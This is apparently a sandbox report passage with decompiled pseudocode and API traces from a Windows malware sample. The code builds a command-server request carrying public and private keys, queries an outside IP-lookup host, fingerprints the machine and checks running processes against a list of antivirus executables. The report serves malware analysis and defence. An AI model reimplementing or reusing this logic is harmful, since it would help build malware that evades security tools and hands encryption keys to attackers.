Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00A86DE6
Part of subcall function 00A86D90: GetComputerNameW.KERNEL32 ref: 00A86DF0
Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00A86E10
Part of subcall function 00A86D90: wsprintfW.USER32 ref: 00A86E51
Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00A86E6E
Part of subcall function 00A86D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00A86E92
Part of subcall function 00A86D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00A86EB6
Part of subcall function 00A86D90: RegCloseKey.KERNEL32(00000000), ref: 00A86ED2

Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86BF2
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86BFD
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C13
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C1E
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(00A848B6,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C34
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C3F
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C55
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C60
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C76
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C81
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C97
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CA2
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CC1
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CCC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 00A857C0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 00A8586A
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00A85883
lstrlenA.KERNEL32(00000000), ref: 00A8588C
lstrlenA.KERNEL32(?), ref: 00A85894
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 00A858A5
lstrlenA.KERNEL32(?), ref: 00A858BF
lstrlenA.KERNEL32(00000000), ref: 00A858E8
lstrlenA.KERNEL32(?), ref: 00A85908
lstrlenA.KERNEL32(?), ref: 00A85934
lstrlenA.KERNEL32(00000000), ref: 00A85945
lstrlenA.KERNEL32(00000000), ref: 00A85967
lstrcatW.KERNEL32(?,action=call&), ref: 00A85981
lstrlenW.KERNEL32(?), ref: 00A8598A
lstrcatW.KERNEL32(?,&pub_key=), ref: 00A8599F
lstrlenW.KERNEL32(?), ref: 00A859A2
lstrlenA.KERNEL32(00000000), ref: 00A859AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,746569A0,00000000), ref: 00A859C0
lstrcatW.KERNEL32(?,&priv_key=), ref: 00A859CC
lstrlenW.KERNEL32(?), ref: 00A859CF
lstrlenA.KERNEL32(00000000), ref: 00A859DC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,746569A0,00000000), ref: 00A859F1
lstrcatW.KERNEL32(?,&version=2.1), ref: 00A859FD
lstrlenW.KERNEL32(?), ref: 00A85A09
VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 00A85A1D
lstrlenW.KERNEL32(?), ref: 00A85A2D
lstrlenW.KERNEL32(?), ref: 00A85A4E
_memset.LIBCMT ref: 00A85A97
lstrlenA.KERNEL32(?), ref: 00A85AAA

Part of subcall function 00A85C40: _memset.LIBCMT ref: 00A85C6D

CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 00A85AF6
GetLastError.KERNEL32 ref: 00A85B00
lstrlenA.KERNEL32(?), ref: 00A85B07
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00A85B16
lstrlenA.KERNEL32(?), ref: 00A85B21
lstrlenA.KERNEL32(?), ref: 00A85B41
lstrlenA.KERNEL32(?), ref: 00A85B64
lstrlenA.KERNEL32(00000000), ref: 00A85B73
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 00A85B84
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A85BB7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A85BC4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A85BD1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A85BF6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A85C03
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A85C10
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A85C2A

Strings

&priv_key=, xrefs: 00A859C6
&version=2.1, xrefs: 00A859F7
#shasj, xrefs: 00A85A50
&pub_key=, xrefs: 00A85999
action=call&, xrefs: 00A8597B

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
String ID: #shasj$&priv_key=$&pub_key=$&version=2.1$action=call&
API String ID: 2781787645-879081296
Opcode ID: 3393afe4b1d9794c193bca0f32279d51659d1698e747c2ce4a0e64d6a532fdba
Instruction ID: 38cb2967a4f8122a37a9ecd835100ecccad3b84fd1cff770c681b6330cbfa32e
Opcode Fuzzy Hash: 3393afe4b1d9794c193bca0f32279d51659d1698e747c2ce4a0e64d6a532fdba
Instruction Fuzzy Hash: 1EE1BC71908301AFD710EF65CC84B6BBBE5FF88754F044A1DF985A72A0DB70A905CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00A87A00 Relevance: 43.9, APIs: 13, Strings: 12, Instructions: 132
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A87A00(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v8;
				void* _v12;
				void* _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				short _v64;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t55;
				long _t60;
				WCHAR* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t68;

				_t65 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E00A877F0(_t65); // executed
				_t40 = InternetConnectW( *(_t65 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t66 = _t40;
				_v8 = 0;
				_v12 = _t66;
				if(_t66 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t63 = _t41;
					_v16 = _t63;
					wsprintfW(_t63, L"%s", _a8);
					_t64 = HttpOpenRequestW(_t66, _a36, _t63, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t64 != 0) {
						_v64 = 0x6f0048;
						_v20 = 0;
						_v60 = 0x740073;
						_v56 = 0x20003a;
						_v52 = 0x6f006e;
						_v48 = 0x6f006d;
						_v44 = 0x650072;
						_v40 = 0x610072;
						_v36 = 0x73006e;
						_v32 = 0x6d006f;
						_v28 = 0x62002e;
						_v24 = 0x740069;
						if(HttpAddRequestHeadersW(_t64,  &_v64, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t64, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t68 = _a20;
								_t60 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
									while(1) {
										_t55 = _a4;
										if(_t55 == 0) {
											goto L13;
										}
										 *((char*)(_t55 + _t68)) = 0;
										_a4 = 0;
										_v8 = 1;
										if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t64); // executed
					InternetCloseHandle(_v12);
					VirtualFree(_v16, 0, 0x8000); // executed
					return _v8;
				} else {
					return _t40;
				}
			}

0x00a87a08
0x00a87a0b
0x00a87a10
0x00a87a13
0x00a87a13
0x00a87a1b
0x00a87a32
0x00a87a38
0x00a87a3a
0x00a87a41
0x00a87a46
0x00a87a5f
0x00a87a68
0x00a87a70
0x00a87a73
0x00a87a97
0x00a87a9b
0x00a87aa3
0x00a87aab
0x00a87ab6
0x00a87abd
0x00a87ac4
0x00a87acb
0x00a87ad2
0x00a87ad9
0x00a87ae0
0x00a87ae7
0x00a87aee
0x00a87af5
0x00a87b04
0x00a87b1b
0x00a87b6c
0x00a87b1d
0x00a87b23
0x00a87b26
0x00a87b2b
0x00a87b3a
0x00a87b40
0x00a87b40
0x00a87b45
0x00000000
0x00000000
0x00a87b47
0x00a87b52
0x00a87b59
0x00a87b68
0x00000000
0x00000000
0x00a87b6a
0x00000000
0x00a87b68
0x00a87b40
0x00a87b3a
0x00a87b1b
0x00a87b04
0x00a87b72
0x00a87b79
0x00a87b7e
0x00a87b8a
0x00a87b99
0x00a87a4e
0x00a87a4e
0x00a87a4e

APIs

InternetCloseHandle.WININET(?), ref: 00A87A13
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00A87A32
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,00A86946,ipv4bot.whatismyipaddress.com,00A903B0,00000000), ref: 00A87A5F
wsprintfW.USER32 ref: 00A87A73
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 00A87A91
HttpAddRequestHeadersW.WININET(00000000,006F0048,000000FF,00000000), ref: 00A87AFC
HttpSendRequestW.WININET(00000000,006F006D,006F006E,00000000,00740069), ref: 00A87B13
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00A87B32
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00A87B60
GetLastError.KERNEL32 ref: 00A87B6C
InternetCloseHandle.WININET(00000000), ref: 00A87B79
InternetCloseHandle.WININET(00000000), ref: 00A87B7E
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00A86946,ipv4bot.whatismyipaddress.com), ref: 00A87B8A

Strings

s, xrefs: 00A87AB6
m, xrefs: 00A87ACB
i, xrefs: 00A87AF5
n, xrefs: 00A87AE0
o, xrefs: 00A87AE7
HTTP/1.1, xrefs: 00A87A87
H, xrefs: 00A87AA3
., xrefs: 00A87AEE
r, xrefs: 00A87AD9
:, xrefs: 00A87ABD
r, xrefs: 00A87AD2
n, xrefs: 00A87AC4

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: .$:$H$HTTP/1.1$i$m$n$n$o$r$r$s
API String ID: 3906118045-86075497
Opcode ID: 46faec9fbff0a44a41e46aa141c4ea2a2043fe6eda3aee95509a4efa32ca58e5
Instruction ID: 261f41a0ce900571c0af7aec67c6d69c9143d0cca8f6484e03b9f48c99793bb0
Opcode Fuzzy Hash: 46faec9fbff0a44a41e46aa141c4ea2a2043fe6eda3aee95509a4efa32ca58e5
Instruction Fuzzy Hash: DC418E31A04209BBEB109F91DC4CFEEBFB9FF04B94F244119FA04A6290C7B19951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A848A0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 165
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A848A0(void* __ecx) {
				void* _v8;
				CHAR* _v12;
				int _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				int _v44;
				int _v48;
				void* _v52;
				char _v72;
				void* _t50;
				void* _t51;
				int _t75;
				void* _t77;
				short* _t98;
				void* _t102;

				_t82 = __ecx;
				Sleep(0x3e8); // executed
				_t50 = E00A84550(_t82); // executed
				if(_t50 != 0) {
					ExitProcess(0);
				}
				_t51 = CreateThread(0, 0, E00A82D30, 0, 0, 0); // executed
				_v8 = _t51;
				if(_v8 != 0) {
					if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
						_t82 = _v8;
						TerminateThread(_v8, 0);
					}
					CloseHandle(_v8); // executed
				}
				E00A84640(); // executed
				E00A840A0(_t82); // executed
				E00A85EF0( &_v72); // executed
				_v36 = 0;
				_v32 = 0;
				_v24 = 0;
				_v40 = 0;
				_t97 =  &_v40;
				E00A85EA0( &_v72,  &_v24,  &_v40,  &_v36,  &_v32);
				_v44 = 0;
				_v12 = 0;
				if(E00A84880(_v24) != 0) {
					ExitProcess(0);
				}
				L8:
				while(_v44 == 0) {
					_t97 = _v40;
					_t77 = E00A85750(_v24, _v40, _v36, _v32,  &_v12); // executed
					_t102 = _t102 + 0xc;
					if(_t77 != 0) {
						_v44 = 1;
					} else {
						Sleep(0x2710);
					}
				}
				E00A85E60( &_v72);
				_v28 = 0;
				_v16 = 0;
				_v48 = 0;
				_v52 = 0;
				__eflags = _v12;
				if(_v12 != 0) {
					_v16 = lstrlenA(_v12);
					_v28 = VirtualAlloc(0, _v16, 0x3000, 4);
					_t97 = _v12;
					_t75 = CryptStringToBinaryA(_v12, 0, 1, _v28,  &_v16, 0, 0);
					__eflags = _t75;
					if(_t75 == 0) {
						ExitProcess(0);
					}
					_v48 = 1;
				}
				E00A83FF0();
				InitializeCriticalSection(0xa92ae8);
				__eflags = _v48;
				if(__eflags == 0) {
					E00A83DE0( &_v72);
				} else {
					_t97 = _v16;
					E00A83FC0(_v28, _v16, __eflags);
				}
				DeleteCriticalSection(0xa92ae8);
				__eflags = E00A83A60();
				if(__eflags != 0) {
					E00A84330(__eflags);
				}
				_v20 = VirtualAlloc(0, 0x200, 0x3000, 4);
				__eflags = _v20;
				if(__eflags != 0) {
					GetModuleFileNameW(0, _v20, 0x100);
					E00A83BA0(_v20, _t97, __eflags);
					VirtualFree(_v20, 0, 0x8000);
				}
				__eflags =  *0xa92ae4;
				if( *0xa92ae4 != 0) {
					_t98 =  *0xa92ae4; // 0x880000
					ShellExecuteW(0, L"open", _t98, 0, 0, 5);
				}
				return E00A85FC0( &_v72);
				goto L8;
			}

0x00a848a0
0x00a848ab
0x00a848b1
0x00a848b8
0x00a848bc
0x00a848bc
0x00a848d1
0x00a848d7
0x00a848de
0x00a848f4
0x00a848f8
0x00a848fc
0x00a848fc
0x00a84906
0x00a84906
0x00a8490c
0x00a84911
0x00a84919
0x00a8491e
0x00a84925
0x00a8492c
0x00a84933
0x00a84942
0x00a8494d
0x00a84952
0x00a84959
0x00a8496a
0x00a8496e
0x00a8496e
0x00000000
0x00a84974
0x00a84986
0x00a8498c
0x00a84991
0x00a84996
0x00a849a5
0x00a84998
0x00a8499d
0x00a8499d
0x00a849ac
0x00a849b1
0x00a849b6
0x00a849bd
0x00a849c4
0x00a849cb
0x00a849d2
0x00a849d6
0x00a849e2
0x00a849f8
0x00a84a0b
0x00a84a0f
0x00a84a15
0x00a84a17
0x00a84a1b
0x00a84a1b
0x00a84a21
0x00a84a21
0x00a84a28
0x00a84a32
0x00a84a38
0x00a84a3c
0x00a84a4e
0x00a84a3e
0x00a84a3e
0x00a84a44
0x00a84a44
0x00a84a58
0x00a84a63
0x00a84a65
0x00a84a67
0x00a84a67
0x00a84a80
0x00a84a83
0x00a84a87
0x00a84a94
0x00a84a9d
0x00a84aad
0x00a84aad
0x00a84ab3
0x00a84aba
0x00a84ac2
0x00a84ad0
0x00a84ad0
0x00a84ae1
0x00000000

APIs

Sleep.KERNEL32(000003E8), ref: 00A848AB

Part of subcall function 00A84550: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A845AC
Part of subcall function 00A84550: lstrcpyW.KERNEL32 ref: 00A845CF
Part of subcall function 00A84550: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A845D6
Part of subcall function 00A84550: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A845EE
Part of subcall function 00A84550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A845FA
Part of subcall function 00A84550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A84601
Part of subcall function 00A84550: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A8461B

ExitProcess.KERNEL32 ref: 00A848BC
CreateThread.KERNEL32 ref: 00A848D1
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00A848E9
TerminateThread.KERNEL32(00000000,00000000), ref: 00A848FC
CloseHandle.KERNEL32(00000000), ref: 00A84906
ExitProcess.KERNEL32 ref: 00A8496E

Strings

open, xrefs: 00A84AC9

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: CreateErrorExitLastProcessThreadVirtual$AllocCloseFreeHandleMutexObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 3160775492-2758837156
Opcode ID: ac0039ad0ce23272bb44be728d646029a839faef9523b69bf54cf7ab376ca5b9
Instruction ID: 4128969ed6a173a730e3e9ae62d3cfc5a3d7d76f71c144314e660356cead4772
Opcode Fuzzy Hash: ac0039ad0ce23272bb44be728d646029a839faef9523b69bf54cf7ab376ca5b9
Instruction Fuzzy Hash: A0612A71A4020AABEB14EBE0DD4EBEFBBB4BF48701F144118F601BA1D0DBB55A45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A87520 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00A87520(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x00a8753d
0x00a8753f
0x00a8754d
0x00a8754f
0x00a87556
0x00a8755d
0x00a87564
0x00a8756b
0x00a87572
0x00a87579
0x00a87580
0x00a87587
0x00a8758e
0x00a87595
0x00a8759c
0x00a875a3
0x00a875aa
0x00a875b1
0x00a875b3
0x00a875b5
0x00a875ba
0x00a875e4
0x00a875ea
0x00a875bc
0x00a875c0
0x00a875c6
0x00a875cc
0x00a875d2
0x00a875ef
0x00a875f1
0x00a875f3
0x00a875f6
0x00a875f9
0x00a875fc
0x00a875ff
0x00a87607
0x00000000
0x00a87610
0x00a87618
0x00a87620
0x00a8762f
0x00a87633
0x00000000
0x00a87635
0x00a87635
0x00a87635
0x00a87697
0x00a87697
0x00a8769e
0x00a876a6
0x00000000
0x00000000
0x00000000
0x00a876a6
0x00a8763e
0x00a8763f
0x00a87641
0x00a87648
0x00a87665
0x00a8766e
0x00a8764a
0x00a8764a
0x00a87657
0x00a87657
0x00a87670
0x00a8768e
0x00a87691
0x00a87694
0x00000000
0x00a87694
0x00a876b7
0x00a876bb
0x00a876bd
0x00a876c3
0x00a876d0
0x00a876d0
0x00a876c3
0x00a876db
0x00a876db
0x00a876eb
0x00a876f0
0x00a876f6
0x00a876fb
0x00a87705
0x00a87705
0x00a8770f
0x00a875d4
0x00a875dc
0x00000000
0x00a875dc
0x00a875d2

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,746566A0,?,76B5C0B0), ref: 00A8753D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00A875B1
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A875C6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A875DC
Process32FirstW.KERNEL32(00000000,00000000), ref: 00A875FF
lstrcmpiW.KERNEL32(00A907DC,-00000024), ref: 00A87625
Process32NextW.KERNEL32(?,?), ref: 00A8769E
GetLastError.KERNEL32 ref: 00A876A8
lstrlenW.KERNEL32(00000000), ref: 00A876C6
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A876EB
FindCloseChangeNotification.KERNEL32(?), ref: 00A876F0
VirtualFree.KERNELBASE(?,?,00008000), ref: 00A87705

Strings

iet, xrefs: 00A87625

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID: iet
API String ID: 1411803383-2308090442
Opcode ID: d5f16384771ec0c048454d2b5d04b2325e7fa8603f628d5b5f6a1759ecf52470
Instruction ID: f566373ea4954927dda31b7ffe91b74195664966bbf983517a18df89344ae50e
Opcode Fuzzy Hash: d5f16384771ec0c048454d2b5d04b2325e7fa8603f628d5b5f6a1759ecf52470
Instruction Fuzzy Hash: B8515771E04218AFCF10EF98DC88BAEBBB4FF44750F248069E505AB290D7B19906CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A87C60 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00A87C60(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
